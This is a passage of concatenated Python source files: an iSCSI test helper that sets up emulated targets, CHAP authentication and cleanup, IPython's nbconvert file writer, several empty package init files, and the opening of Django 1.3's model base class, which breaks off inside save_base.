        else:
            self.portal_ip = "localhost"
        if params.get("iscsi_thread_id"):
            self.id = params.get("iscsi_thread_id")
        else:
            self.id = utils.generate_random_string(4)
        self.initiator = params.get("initiator")
        # CHAP AUTHENTICATION
        self.chap_flag = False
        self.chap_user = params.get("chap_user")
        self.chap_passwd = params.get("chap_passwd")
        if self.chap_user and self.chap_passwd:
            self.chap_flag = True
        if params.get("emulated_image"):
            # Emulated targets are exported locally via tgtd; any custom
            # initiator name is ignored for them.
            self.initiator = None
            os_dep.command("tgtadm")
            emulated_image = params.get("emulated_image")
            self.emulated_image = os.path.join(root_dir, emulated_image)
            self.emulated_id = ""
            self.emulated_size = params.get("image_size")
            self.unit = self.emulated_size[-1].upper()
            self.emulated_size = self.emulated_size[:-1]
            # maps K,M,G,T => (count, bs)
            emulated_size = {'K': (1, 1),
                             'M': (1, 1024),
                             'G': (1024, 1024),
                             'T': (1024, 1048576),
                             }
            if self.unit in emulated_size:
                block_size = emulated_size[self.unit][1]
                size = int(self.emulated_size) * emulated_size[self.unit][0]
                self.emulated_expect_size = block_size * size
                self.create_cmd = ("dd if=/dev/zero of=%s count=%s bs=%sK"
                                   % (self.emulated_image, size, block_size))
    def logged_in(self):
        """
        Check if the session is login or not.
        """
        sessions = iscsi_get_sessions()
        login = False
        if self.target in map(lambda x: x[1], sessions):
            login = True
        return login
    def portal_visible(self):
        """
        Check if the portal can be found or not.
        """
        return bool(re.findall("%s$" % self.target,
                               iscsi_discover(self.portal_ip), re.M))
    def login(self):
        """
        Login session for both real iscsi device and emulated iscsi. Include
        env check and setup.
        """
        login_flag = False
        if self.portal_visible():
            login_flag = True
        elif self.initiator:
            # Swap in the custom initiator name and retry discovery.
            logging.debug("Try to update iscsi initiatorname")
            cmd = "mv /etc/iscsi/initiatorname.iscsi "
            cmd += "/etc/iscsi/initiatorname.iscsi-%s" % self.id
            utils.system(cmd)
            fd = open("/etc/iscsi/initiatorname.iscsi", 'w')
            fd.write("InitiatorName=%s" % self.initiator)
            fd.close()
            utils.system("service iscsid restart")
            if self.portal_visible():
                login_flag = True
        elif self.emulated_image:
            # Export the emulated target locally, then retry discovery.
            self.export_target()
            utils.system("service iscsid restart")
            if self.portal_visible():
                login_flag = True
        if login_flag:
            iscsi_login(self.target, self.portal_ip)
    def get_device_name(self):
        """
        Get device name from the target name.
        """
        cmd = "iscsiadm -m session -P 3"
        device_name = ""
        if self.logged_in():
            output = utils.system_output(cmd)
            pattern = r"Target:\s+%s.*?disk\s(\w+)\s+\S+\srunning" % self.target
            device_name = re.findall(pattern, output, re.S)
            try:
                device_name = "/dev/%s" % device_name[0]
            except IndexError:
                logging.error("Can not find target '%s' after login.", self.target)
        else:
            logging.error("Session is not logged in yet.")
        return device_name
    def get_target_id(self):
        """
        Get target id from image name. Only works for emulated iscsi device
        """
        cmd = "tgtadm --lld iscsi --mode target --op show"
        target_info = utils.system_output(cmd)
        target_id = ""
        for line in re.split("\n", target_info):
            # Remember the most recent target id seen; stop once the
            # backing store line matching our image is found under it.
            if re.findall("Target\s+(\d+)", line):
                target_id = re.findall("Target\s+(\d+)", line)[0]
            if re.findall("Backing store path:\s+(/+.+)", line):
                if self.emulated_image in line:
                    break
        else:
            # Loop completed without a break: image not exported.
            target_id = ""
        return target_id
    def get_chap_accounts(self):
        """
        Get all CHAP authentication accounts
        """
        cmd = "tgtadm --lld iscsi --op show --mode account"
        all_accounts = utils.system_output(cmd)
        if all_accounts:
            # First line is the "Account list:" header; skip it.
            all_accounts = map(str.strip, all_accounts.splitlines()[1:])
        return all_accounts
    def add_chap_account(self):
        """
        Add CHAP authentication account
        """
        try:
            cmd = "tgtadm --lld iscsi --op new --mode account"
            cmd += " --user %s" % self.chap_user
            cmd += " --password %s" % self.chap_passwd
            utils.system(cmd)
        except error.CmdError as err:
            logging.error("Fail to add account: %s", err)
        # Check the new add account exist
        if self.chap_user not in self.get_chap_accounts():
            logging.error("Can't find account %s" % self.chap_user)
    def delete_chap_account(self):
        """
        Delete the CHAP authentication account
        """
        if self.chap_user in self.get_chap_accounts():
            cmd = "tgtadm --lld iscsi --op delete --mode account"
            cmd += " --user %s" % self.chap_user
            utils.system(cmd)
    def get_target_account_info(self):
        """
        Get the target account information
        """
        cmd = "tgtadm --lld iscsi --mode target --op show"
        target_info = utils.system_output(cmd)
        pattern = r"Target\s+\d:\s+%s" % self.target
        pattern += ".*Account information:\s(.*)ACL information"
        try:
            target_account = re.findall(pattern, target_info,
                                        re.S)[0].strip().splitlines()
        except IndexError:
            target_account = []
        return map(str.strip, target_account)
    def set_chap_auth_target(self):
        """
        Set CHAP authentication on a target, it will require authentication
        before an initiator is allowed to log in and access devices.
        """
        if self.chap_user not in self.get_chap_accounts():
            self.add_chap_account()
        if self.chap_user in self.get_target_account_info():
            logging.debug("Target %s already has account %s", self.target,
                          self.chap_user)
        else:
            cmd = "tgtadm --lld iscsi --op bind --mode account"
            cmd += " --tid %s --user %s" % (self.emulated_id, self.chap_user)
            utils.system(cmd)
    def set_chap_auth_initiator(self):
        """
        Set CHAP authentication for initiator.
        """
        name_dict = {'node.session.auth.authmethod': 'CHAP'}
        name_dict['node.session.auth.username'] = self.chap_user
        name_dict['node.session.auth.password'] = self.chap_passwd
        for name in name_dict.keys():
            cmd = "iscsiadm --mode node --targetname %s " % self.target
            cmd += "--op update --name %s --value %s" % (name, name_dict[name])
            try:
                utils.system(cmd)
            except error.CmdError:
                logging.error("Fail to set CHAP authentication for initiator")
    def export_target(self):
        """
        Export target in localhost for emulated iscsi
        """
        selinux_mode = None
        if not os.path.isfile(self.emulated_image):
            utils.system(self.create_cmd)
        else:
            emulated_image_size = os.path.getsize(self.emulated_image) / 1024
            if emulated_image_size != self.emulated_expect_size:
                # No need to remvoe, rebuild is fine
                utils.system(self.create_cmd)
        cmd = "tgtadm --lld iscsi --mode target --op show"
        try:
            output = utils.system_output(cmd)
        except error.CmdError:
            # tgtd may not be running yet; restart and retry once.
            utils.system("service tgtd restart")
            output = utils.system_output(cmd)
        if not re.findall("%s$" % self.target, output, re.M):
            logging.debug("Need to export target in host")
            # Set selinux to permissive mode to make sure iscsi target
            # export successfully
            if utils_selinux.is_enforcing():
                selinux_mode = utils_selinux.get_status()
                utils_selinux.set_status("permissive")
            # Pick the first unused numeric target id.
            output = utils.system_output(cmd)
            used_id = re.findall("Target\s+(\d+)", output)
            emulated_id = 1
            while str(emulated_id) in used_id:
                emulated_id += 1
            self.emulated_id = str(emulated_id)
            cmd = "tgtadm --mode target --op new --tid %s" % self.emulated_id
            cmd += " --lld iscsi --targetname %s" % self.target
            utils.system(cmd)
            cmd = "tgtadm --lld iscsi --op bind --mode target "
            cmd += "--tid %s -I ALL" % self.emulated_id
            utils.system(cmd)
        else:
            target_strs = re.findall("Target\s+(\d+):\s+%s$" %
                                     self.target, output, re.M)
            self.emulated_id = target_strs[0].split(':')[0].split()[-1]
        cmd = "tgtadm --lld iscsi --mode target --op show"
        try:
            output = utils.system_output(cmd)
        except error.CmdError:   # In case service stopped
            utils.system("service tgtd restart")
            output = utils.system_output(cmd)
        # Create a LUN with emulated image
        if re.findall(self.emulated_image, output, re.M):
            # Exist already
            logging.debug("Exported image already exists.")
            self.export_flag = True
        else:
            # Next free LUN number == count of LUNs under this target
            # (LUN 0 is the implicit controller LUN).
            tgt_str = re.search(r'.*(Target\s+\d+:\s+%s\s*.*)$' % self.target,
                                output, re.DOTALL)
            if tgt_str:
                luns = len(re.findall("\s+LUN:\s(\d+)",
                                      tgt_str.group(1), re.M))
            else:
                luns = len(re.findall("\s+LUN:\s(\d+)", output, re.M))
            cmd = "tgtadm --mode logicalunit --op new "
            cmd += "--tid %s --lld iscsi " % self.emulated_id
            cmd += "--lun %s " % luns
            cmd += "--backing-store %s" % self.emulated_image
            utils.system(cmd)
            self.export_flag = True
        # Restore selinux
        if selinux_mode is not None:
            utils_selinux.set_status(selinux_mode)
        if self.chap_flag:
            # Set CHAP authentication on the exported target
            self.set_chap_auth_target()
            # Set CHAP authentication for initiator to login target
            if self.portal_visible():
                self.set_chap_auth_initiator()
    def delete_target(self):
        """
        Delete target from host.
        """
        cmd = "tgtadm --lld iscsi --mode target --op show"
        output = utils.system_output(cmd)
        if re.findall("%s$" % self.target, output, re.M):
            if self.emulated_id:
                cmd = "tgtadm --lld iscsi --mode target --op delete "
                cmd += "--tid %s" % self.emulated_id
                utils.system(cmd)
    def logout(self):
        """
        Logout from target.
        """
        if self.logged_in():
            iscsi_logout(self.target)
    def cleanup(self):
        """
        Clean up env after iscsi used.
        """
        self.logout()
        # Restore the original initiator name if login() replaced it.
        if os.path.isfile("/etc/iscsi/initiatorname.iscsi-%s" % self.id):
            cmd = " mv /etc/iscsi/initiatorname.iscsi-%s" % self.id
            cmd += " /etc/iscsi/initiatorname.iscsi"
            utils.system(cmd)
            cmd = "service iscsid restart"
            utils.system(cmd)
        if self.export_flag:
            self.delete_target()
|
WillisXChen/django-oscar | refs/heads/master | oscar/lib/python2.7/site-packages/IPython/nbconvert/writers/files.py | 7 | """
Contains writer for writing nbconvert output to filesystem.
"""
#-----------------------------------------------------------------------------
#Copyright (c) 2013, the IPython Development Team.
#
#Distributed under the terms of the Modified BSD License.
#
#The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import io
import os
import glob
from IPython.utils.traitlets import Unicode
from IPython.utils.path import link_or_copy
from .base import WriterBase
#-----------------------------------------------------------------------------
# Classes
#-----------------------------------------------------------------------------
class FilesWriter(WriterBase):
    """Consumes nbconvert output and produces files."""
    build_directory = Unicode("", config=True,
                              help="""Directory to write output to. Leave blank
                              to output to the current directory""")
    # Make sure that the output directory exists.
    def _build_directory_changed(self, name, old, new):
        # Traitlets change handler: create the directory as soon as the
        # config value is set to a non-empty path.
        if new and not os.path.isdir(new):
            os.makedirs(new)
    def __init__(self, **kw):
        super(FilesWriter, self).__init__(**kw)
        # Fire the handler once so a directory supplied at construction
        # time is created too (traitlets only notifies on *changes*).
        self._build_directory_changed('build_directory', self.build_directory,
                                      self.build_directory)
    def _makedir(self, path):
        """Make a directory if it doesn't already exist"""
        if path and not os.path.isdir(path):
            self.log.info("Making directory %s", path)
            os.makedirs(path)
    def write(self, output, resources, notebook_name=None, **kw):
        """
        Consume and write Jinja output to the file system.  Output directory
        is set via the 'build_directory' variable of this instance (a
        configurable).

        See base for more...
        """
        # Verify that a notebook name is provided.
        if notebook_name is None:
            raise TypeError('notebook_name')
        # Pull the extension and subdir from the resources dict.
        output_extension = resources.get('output_extension', None)
        # Write all of the extracted resources to the destination directory.
        # NOTE: WE WRITE EVERYTHING AS-IF IT'S BINARY. THE EXTRACT FIG
        # PREPROCESSOR SHOULD HANDLE UNIX/WINDOWS LINE ENDINGS...
        for filename, data in resources.get('outputs', {}).items():
            # Determine where to write the file to
            dest = os.path.join(self.build_directory, filename)
            path = os.path.dirname(dest)
            self._makedir(path)
            # Write file
            self.log.debug("Writing %i bytes to support file %s", len(data), dest)
            with io.open(dest, 'wb') as f:
                f.write(data)
        # Copy referenced files to output directory
        if self.build_directory:
            for filename in self.files:
                # Copy files that match search pattern
                for matching_filename in glob.glob(filename):
                    # Make sure folder exists.
                    # NOTE(review): dest is derived from the glob *pattern*
                    # (filename), not from matching_filename -- if a pattern
                    # matches several files they all map to the same dest.
                    # Confirm intent before changing.
                    dest = os.path.join(self.build_directory, filename)
                    path = os.path.dirname(dest)
                    self._makedir(path)
                    # Copy if destination is different.
                    if not os.path.normpath(dest) == os.path.normpath(matching_filename):
                        self.log.info("Linking %s -> %s", matching_filename, dest)
                        link_or_copy(matching_filename, dest)
        # Determine where to write conversion results.
        if output_extension is not None:
            dest = notebook_name + '.' + output_extension
        else:
            dest = notebook_name
        if self.build_directory:
            dest = os.path.join(self.build_directory, dest)
        # Write conversion results.
        self.log.info("Writing %i bytes to %s", len(output), dest)
        with io.open(dest, 'w', encoding='utf-8') as f:
            f.write(output)
        return dest
|
ajaali/django | refs/heads/master | django/conf/locale/fi/__init__.py | 12133432 | |
devassistant/devassistant | refs/heads/master | test/integration/__init__.py | 12133432 | |
homeworkprod/byceps | refs/heads/master | tests/util/iterables/__init__.py | 12133432 | |
fernandog/Medusa | refs/heads/optimized | ext/future/backports/email/mime/__init__.py | 12133432 | |
ThunderShiviah/code_guild | refs/heads/master | wk2/extras/linked_lists/add_reverse/__init__.py | 12133432 | |
thehyve/variant | refs/heads/master | eggs/django-1.3.1-py2.7.egg/django/db/models/base.py | 55 | import types
import sys
from itertools import izip
import django.db.models.manager # Imported to register signal handler.
from django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned, FieldError, ValidationError, NON_FIELD_ERRORS
from django.core import validators
from django.db.models.fields import AutoField, FieldDoesNotExist
from django.db.models.fields.related import (OneToOneRel, ManyToOneRel,
OneToOneField, add_lazy_relation)
from django.db.models.query import Q
from django.db.models.query_utils import DeferredAttribute
from django.db.models.deletion import Collector
from django.db.models.options import Options
from django.db import (connections, router, transaction, DatabaseError,
DEFAULT_DB_ALIAS)
from django.db.models import signals
from django.db.models.loading import register_models, get_model
from django.utils.translation import ugettext_lazy as _
import django.utils.copycompat as copy
from django.utils.functional import curry, update_wrapper
from django.utils.encoding import smart_str, force_unicode
from django.utils.text import get_text_list, capfirst
from django.conf import settings
class ModelBase(type):
    """
    Metaclass for all models.
    """
    def __new__(cls, name, bases, attrs):
        """
        Build a new model class: attach ``_meta`` (Options), wire up
        inheritance (abstract, proxy and multi-table), contribute every
        declared field/manager, and register the result with the app cache.
        Returns the already-registered class if one exists for this name.
        """
        super_new = super(ModelBase, cls).__new__
        parents = [b for b in bases if isinstance(b, ModelBase)]
        if not parents:
            # If this isn't a subclass of Model, don't do anything special.
            return super_new(cls, name, bases, attrs)
        # Create the class.
        module = attrs.pop('__module__')
        new_class = super_new(cls, name, bases, {'__module__': module})
        attr_meta = attrs.pop('Meta', None)
        abstract = getattr(attr_meta, 'abstract', False)
        if not attr_meta:
            meta = getattr(new_class, 'Meta', None)
        else:
            meta = attr_meta
        base_meta = getattr(new_class, '_meta', None)
        if getattr(meta, 'app_label', None) is None:
            # Figure out the app_label by looking one level up.
            # For 'django.contrib.sites.models', this would be 'sites'.
            model_module = sys.modules[new_class.__module__]
            kwargs = {"app_label": model_module.__name__.split('.')[-2]}
        else:
            kwargs = {}
        new_class.add_to_class('_meta', Options(meta, **kwargs))
        if not abstract:
            # Concrete models get per-class DoesNotExist /
            # MultipleObjectsReturned exceptions inheriting from the
            # corresponding exceptions of each concrete parent.
            new_class.add_to_class('DoesNotExist', subclass_exception('DoesNotExist',
                    tuple(x.DoesNotExist
                            for x in parents if hasattr(x, '_meta') and not x._meta.abstract)
                                    or (ObjectDoesNotExist,), module))
            new_class.add_to_class('MultipleObjectsReturned', subclass_exception('MultipleObjectsReturned',
                    tuple(x.MultipleObjectsReturned
                            for x in parents if hasattr(x, '_meta') and not x._meta.abstract)
                                    or (MultipleObjectsReturned,), module))
            if base_meta and not base_meta.abstract:
                # Non-abstract child classes inherit some attributes from their
                # non-abstract parent (unless an ABC comes before it in the
                # method resolution order).
                if not hasattr(meta, 'ordering'):
                    new_class._meta.ordering = base_meta.ordering
                if not hasattr(meta, 'get_latest_by'):
                    new_class._meta.get_latest_by = base_meta.get_latest_by
        is_proxy = new_class._meta.proxy
        if getattr(new_class, '_default_manager', None):
            if not is_proxy:
                # Multi-table inheritance doesn't inherit default manager from
                # parents.
                new_class._default_manager = None
                new_class._base_manager = None
            else:
                # Proxy classes do inherit parent's default manager, if none is
                # set explicitly.
                new_class._default_manager = new_class._default_manager._copy_to_model(new_class)
                new_class._base_manager = new_class._base_manager._copy_to_model(new_class)
        # Bail out early if we have already created this class.
        m = get_model(new_class._meta.app_label, name, False)
        if m is not None:
            return m
        # Add all attributes to the class.
        for obj_name, obj in attrs.items():
            new_class.add_to_class(obj_name, obj)
        # All the fields of any type declared on this model
        new_fields = new_class._meta.local_fields + \
                     new_class._meta.local_many_to_many + \
                     new_class._meta.virtual_fields
        field_names = set([f.name for f in new_fields])
        # Basic setup for proxy models.
        if is_proxy:
            base = None
            for parent in [cls for cls in parents if hasattr(cls, '_meta')]:
                if parent._meta.abstract:
                    if parent._meta.fields:
                        raise TypeError("Abstract base class containing model fields not permitted for proxy model '%s'." % name)
                    else:
                        continue
                if base is not None:
                    raise TypeError("Proxy model '%s' has more than one non-abstract model base class." % name)
                else:
                    base = parent
            if base is None:
                raise TypeError("Proxy model '%s' has no non-abstract model base class." % name)
            if (new_class._meta.local_fields or
                new_class._meta.local_many_to_many):
                raise FieldError("Proxy model '%s' contains model fields." % name)
            while base._meta.proxy:
                base = base._meta.proxy_for_model
            new_class._meta.setup_proxy(base)
        # Do the appropriate setup for any model parents.
        o2o_map = dict([(f.rel.to, f) for f in new_class._meta.local_fields
                        if isinstance(f, OneToOneField)])
        for base in parents:
            original_base = base
            if not hasattr(base, '_meta'):
                # Things without _meta aren't functional models, so they're
                # uninteresting parents.
                continue
            parent_fields = base._meta.local_fields + base._meta.local_many_to_many
            # Check for clashes between locally declared fields and those
            # on the base classes (we cannot handle shadowed fields at the
            # moment).
            for field in parent_fields:
                if field.name in field_names:
                    raise FieldError('Local field %r in class %r clashes '
                                     'with field of similar name from '
                                     'base class %r' %
                                        (field.name, name, base.__name__))
            if not base._meta.abstract:
                # Concrete classes...
                while base._meta.proxy:
                    # Skip over a proxy class to the "real" base it proxies.
                    base = base._meta.proxy_for_model
                if base in o2o_map:
                    field = o2o_map[base]
                elif not is_proxy:
                    # Multi-table inheritance: implicit parent link field.
                    attr_name = '%s_ptr' % base._meta.module_name
                    field = OneToOneField(base, name=attr_name,
                            auto_created=True, parent_link=True)
                    new_class.add_to_class(attr_name, field)
                else:
                    field = None
                new_class._meta.parents[base] = field
            else:
                # .. and abstract ones.
                for field in parent_fields:
                    new_class.add_to_class(field.name, copy.deepcopy(field))
                # Pass any non-abstract parent classes onto child.
                new_class._meta.parents.update(base._meta.parents)
            # Inherit managers from the abstract base classes.
            new_class.copy_managers(base._meta.abstract_managers)
            # Proxy models inherit the non-abstract managers from their base,
            # unless they have redefined any of them.
            if is_proxy:
                new_class.copy_managers(original_base._meta.concrete_managers)
            # Inherit virtual fields (like GenericForeignKey) from the parent
            # class
            for field in base._meta.virtual_fields:
                if base._meta.abstract and field.name in field_names:
                    raise FieldError('Local field %r in class %r clashes '\
                                     'with field of similar name from '\
                                     'abstract base class %r' % \
                                        (field.name, name, base.__name__))
                new_class.add_to_class(field.name, copy.deepcopy(field))
        if abstract:
            # Abstract base models can't be instantiated and don't appear in
            # the list of models for an app. We do the final setup for them a
            # little differently from normal models.
            attr_meta.abstract = False
            new_class.Meta = attr_meta
            return new_class
        new_class._prepare()
        register_models(new_class._meta.app_label, new_class)
        # Because of the way imports happen (recursively), we may or may not be
        # the first time this model tries to register with the framework. There
        # should only be one class for each model, so we always return the
        # registered version.
        return get_model(new_class._meta.app_label, name, False)
    def copy_managers(cls, base_managers):
        """
        Copy managers inherited from a base class onto this class, unless
        the class already overrides the name with something else.
        """
        # This is in-place sorting of an Options attribute, but that's fine.
        base_managers.sort()
        for _, mgr_name, manager in base_managers:
            val = getattr(cls, mgr_name, None)
            if not val or val is manager:
                new_manager = manager._copy_to_model(cls)
                cls.add_to_class(mgr_name, new_manager)
    def add_to_class(cls, name, value):
        """
        Attach ``value`` to the class, honouring the contribute_to_class
        protocol used by fields, managers and Options.
        """
        if hasattr(value, 'contribute_to_class'):
            value.contribute_to_class(cls, name)
        else:
            setattr(cls, name, value)
    def _prepare(cls):
        """
        Creates some methods once self._meta has been populated.
        """
        opts = cls._meta
        opts._prepare(cls)
        if opts.order_with_respect_to:
            cls.get_next_in_order = curry(cls._get_next_or_previous_in_order, is_next=True)
            cls.get_previous_in_order = curry(cls._get_next_or_previous_in_order, is_next=False)
            # defer creating accessors on the foreign class until we are
            # certain it has been created
            def make_foreign_order_accessors(field, model, cls):
                setattr(
                    field.rel.to,
                    'get_%s_order' % cls.__name__.lower(),
                    curry(method_get_order, cls)
                )
                setattr(
                    field.rel.to,
                    'set_%s_order' % cls.__name__.lower(),
                    curry(method_set_order, cls)
                )
            add_lazy_relation(
                cls,
                opts.order_with_respect_to,
                opts.order_with_respect_to.rel.to,
                make_foreign_order_accessors
            )
        # Give the class a docstring -- its definition.
        if cls.__doc__ is None:
            cls.__doc__ = "%s(%s)" % (cls.__name__, ", ".join([f.attname for f in opts.fields]))
        if hasattr(cls, 'get_absolute_url'):
            cls.get_absolute_url = update_wrapper(curry(get_absolute_url, opts, cls.get_absolute_url),
                                                  cls.get_absolute_url)
        signals.class_prepared.send(sender=cls)
class ModelState(object):
    """
    A class for storing instance state
    """
    def __init__(self, db=None):
        # If true, uniqueness validation checks will consider this a new,
        # as-yet-unsaved object. Necessary for correct validation of new
        # instances of objects with explicit (non-auto) PKs.
        # This impacts validation only; it has no effect on the actual save.
        self.adding = True
        # Alias of the database this instance was loaded from, or None.
        self.db = db
class Model(object):
__metaclass__ = ModelBase
_deferred = False
    def __init__(self, *args, **kwargs):
        """
        Populate field values from positional args (in ``_meta.fields``
        order) or keyword args; any field not supplied falls back to its
        default. Emits pre_init/post_init signals around the setup.
        """
        signals.pre_init.send(sender=self.__class__, args=args, kwargs=kwargs)
        # Set up the storage for instance state
        self._state = ModelState()
        # There is a rather weird disparity here; if kwargs, it's set, then args
        # overrides it. It should be one or the other; don't duplicate the work
        # The reason for the kwargs check is that standard iterator passes in by
        # args, and instantiation for iteration is 33% faster.
        args_len = len(args)
        if args_len > len(self._meta.fields):
            # Daft, but matches old exception sans the err msg.
            raise IndexError("Number of args exceeds number of fields")
        fields_iter = iter(self._meta.fields)
        if not kwargs:
            # The ordering of the izip calls matter - izip throws StopIteration
            # when an iter throws it. So if the first iter throws it, the second
            # is *not* consumed. We rely on this, so don't change the order
            # without changing the logic.
            for val, field in izip(args, fields_iter):
                setattr(self, field.attname, val)
        else:
            # Slower, kwargs-ready version.
            for val, field in izip(args, fields_iter):
                setattr(self, field.attname, val)
                kwargs.pop(field.name, None)
                # Maintain compatibility with existing calls.
                if isinstance(field.rel, ManyToOneRel):
                    kwargs.pop(field.attname, None)
        # Now we're left with the unprocessed fields that *must* come from
        # keywords, or default.
        for field in fields_iter:
            is_related_object = False
            # This slightly odd construct is so that we can access any
            # data-descriptor object (DeferredAttribute) without triggering its
            # __get__ method.
            if (field.attname not in kwargs and
                    isinstance(self.__class__.__dict__.get(field.attname), DeferredAttribute)):
                # This field will be populated on request.
                continue
            if kwargs:
                if isinstance(field.rel, ManyToOneRel):
                    try:
                        # Assume object instance was passed in.
                        rel_obj = kwargs.pop(field.name)
                        is_related_object = True
                    except KeyError:
                        try:
                            # Object instance wasn't passed in -- must be an ID.
                            val = kwargs.pop(field.attname)
                        except KeyError:
                            val = field.get_default()
                    else:
                        # Object instance was passed in. Special case: You can
                        # pass in "None" for related objects if it's allowed.
                        if rel_obj is None and field.null:
                            val = None
                else:
                    try:
                        val = kwargs.pop(field.attname)
                    except KeyError:
                        # This is done with an exception rather than the
                        # default argument on pop because we don't want
                        # get_default() to be evaluated, and then not used.
                        # Refs #12057.
                        val = field.get_default()
            else:
                val = field.get_default()
            if is_related_object:
                # If we are passed a related instance, set it using the
                # field.name instead of field.attname (e.g. "user" instead of
                # "user_id") so that the object gets properly cached (and type
                # checked) by the RelatedObjectDescriptor.
                setattr(self, field.name, rel_obj)
            else:
                setattr(self, field.attname, val)
        if kwargs:
            # Remaining keywords may be settable properties on the class;
            # anything else is a genuine error.
            for prop in kwargs.keys():
                try:
                    if isinstance(getattr(self.__class__, prop), property):
                        setattr(self, prop, kwargs.pop(prop))
                except AttributeError:
                    pass
            if kwargs:
                raise TypeError("'%s' is an invalid keyword argument for this function" % kwargs.keys()[0])
        super(Model, self).__init__()
        signals.post_init.send(sender=self.__class__, instance=self)
    def __repr__(self):
        """Return '<ClassName: unicode(self)>' as a bytestring (Python 2)."""
        try:
            u = unicode(self)
        except (UnicodeEncodeError, UnicodeDecodeError):
            # A broken __unicode__ must not make repr() itself blow up.
            u = '[Bad Unicode data]'
        return smart_str(u'<%s: %s>' % (self.__class__.__name__, u))
    def __str__(self):
        """Return the UTF-8 encoded __unicode__ value, or a generic label."""
        if hasattr(self, '__unicode__'):
            # Delegate to the user-defined __unicode__ and encode (Python 2).
            return force_unicode(self).encode('utf-8')
        return '%s object' % self.__class__.__name__
def __eq__(self, other):
return isinstance(other, self.__class__) and self._get_pk_val() == other._get_pk_val()
    def __ne__(self, other):
        # Python 2 does not derive != from ==, so invert __eq__ explicitly.
        return not self.__eq__(other)
    def __hash__(self):
        # Hash on the primary key so saved instances hash consistently with
        # __eq__.  NOTE(review): unsaved instances (pk is None) all share
        # hash(None) — confirm callers avoid hashing unsaved objects.
        return hash(self._get_pk_val())
    def __reduce__(self):
        """
        Provide pickling support. Normally, this just dispatches to Python's
        standard handling. However, for models with deferred field loading, we
        need to do things manually, as they're dynamically created classes and
        only module-level classes can be pickled by the default path.
        """
        data = self.__dict__
        model = self.__class__
        # The obvious thing to do here is to invoke super().__reduce__()
        # for the non-deferred case. Don't do that.
        # On Python 2.4, there is something weird with __reduce__,
        # and as a result, the super call will cause an infinite recursion.
        # See #10547 and #12121.
        defers = []
        pk_val = None
        if self._deferred:
            # Deferred classes are created dynamically, so pickle must record
            # the concrete base model plus the deferred attribute names.
            from django.db.models.query_utils import deferred_class_factory
            factory = deferred_class_factory
            for field in self._meta.fields:
                if isinstance(self.__class__.__dict__.get(field.attname),
                        DeferredAttribute):
                    defers.append(field.attname)
                    if pk_val is None:
                        # The pk_val and model values are the same for all
                        # DeferredAttribute classes, so we only need to do this
                        # once.
                        obj = self.__class__.__dict__[field.attname]
                        model = obj.model_ref()
        else:
            factory = simple_class_factory
        # (callable, args, state) triple per the pickle reduce protocol.
        return (model_unpickle, (model, defers, factory), data)
def _get_pk_val(self, meta=None):
if not meta:
meta = self._meta
return getattr(self, meta.pk.attname)
    def _set_pk_val(self, value):
        # Assign the new primary key value onto the pk field's attribute.
        return setattr(self, self._meta.pk.attname, value)
    # ``instance.pk`` is a field-name-agnostic alias for the primary key.
    pk = property(_get_pk_val, _set_pk_val)
    def serializable_value(self, field_name):
        """
        Returns the value of the field name for this instance. If the field is
        a foreign key, returns the id value, instead of the object. If there's
        no Field object with this name on the model, the model attribute's
        value is returned directly.
        Used to serialize a field's value (in the serializer, or form output,
        for example). Normally, you would just access the attribute directly
        and not use this method.
        """
        try:
            field = self._meta.get_field_by_name(field_name)[0]
        except FieldDoesNotExist:
            # Not a model field (e.g. a plain attribute/property): return raw.
            return getattr(self, field_name)
        # attname gives the raw column value (e.g. "user_id", not "user").
        return getattr(self, field.attname)
    def save(self, force_insert=False, force_update=False, using=None):
        """
        Saves the current instance. Override this in a subclass if you want to
        control the saving process.
        The 'force_insert' and 'force_update' parameters can be used to insist
        that the "save" must be an SQL insert or update (or equivalent for
        non-SQL backends), respectively. Normally, they should not be set.

        ``using`` selects the database alias; defaults to the write router.
        Raises ValueError when both force flags are set (mutually exclusive).
        """
        if force_insert and force_update:
            raise ValueError("Cannot force both insert and updating in model saving.")
        self.save_base(using=using, force_insert=force_insert, force_update=force_update)
    # Flag used by the template system: calling this mutates state.
    save.alters_data = True
    def save_base(self, raw=False, cls=None, origin=None, force_insert=False,
            force_update=False, using=None):
        """
        Does the heavy-lifting involved in saving. Subclasses shouldn't need to
        override this method. It's separate from save() in order to hide the
        need for overrides of save() to pass around internal-only parameters
        ('raw', 'cls', and 'origin').

        ``cls`` is the concrete class being written on this recursion level
        (parents are saved first in multi-table inheritance); ``origin`` is the
        class used as the sender of pre/post_save signals.
        """
        using = using or router.db_for_write(self.__class__, instance=self)
        connection = connections[using]
        assert not (force_insert and force_update)
        if cls is None:
            cls = self.__class__
            meta = cls._meta
            if not meta.proxy:
                origin = cls
        else:
            meta = cls._meta
        if origin and not meta.auto_created:
            signals.pre_save.send(sender=origin, instance=self, raw=raw, using=using)
        # If we are in a raw save, save the object exactly as presented.
        # That means that we don't try to be smart about saving attributes
        # that might have come from the parent class - we just save the
        # attributes we have been given to the class we have been given.
        # We also go through this process to defer the save of proxy objects
        # to their actual underlying model.
        if not raw or meta.proxy:
            if meta.proxy:
                org = cls
            else:
                org = None
            # Save all parent links first (multi-table inheritance).
            for parent, field in meta.parents.items():
                # At this point, parent's primary key field may be unknown
                # (for example, from administration form which doesn't fill
                # this field). If so, fill it.
                if field and getattr(self, parent._meta.pk.attname) is None and getattr(self, field.attname) is not None:
                    setattr(self, parent._meta.pk.attname, getattr(self, field.attname))
                self.save_base(cls=parent, origin=org, using=using)
                if field:
                    setattr(self, field.attname, self._get_pk_val(parent._meta))
            if meta.proxy:
                return
        if not meta.proxy:
            non_pks = [f for f in meta.local_fields if not f.primary_key]
            # First, try an UPDATE. If that doesn't update anything, do an INSERT.
            pk_val = self._get_pk_val(meta)
            pk_set = pk_val is not None
            record_exists = True
            manager = cls._base_manager
            if pk_set:
                # Determine whether a record with the primary key already exists.
                if (force_update or (not force_insert and
                        manager.using(using).filter(pk=pk_val).exists())):
                    # It does already exist, so do an UPDATE.
                    # NOTE(review): the `raw and x or y` idiom falls through to
                    # pre_save() when the raw attribute value is falsy (0, '').
                    if force_update or non_pks:
                        values = [(f, None, (raw and getattr(self, f.attname) or f.pre_save(self, False))) for f in non_pks]
                        rows = manager.using(using).filter(pk=pk_val)._update(values)
                        if force_update and not rows:
                            raise DatabaseError("Forced update did not affect any rows.")
                else:
                    record_exists = False
            if not pk_set or not record_exists:
                if meta.order_with_respect_to:
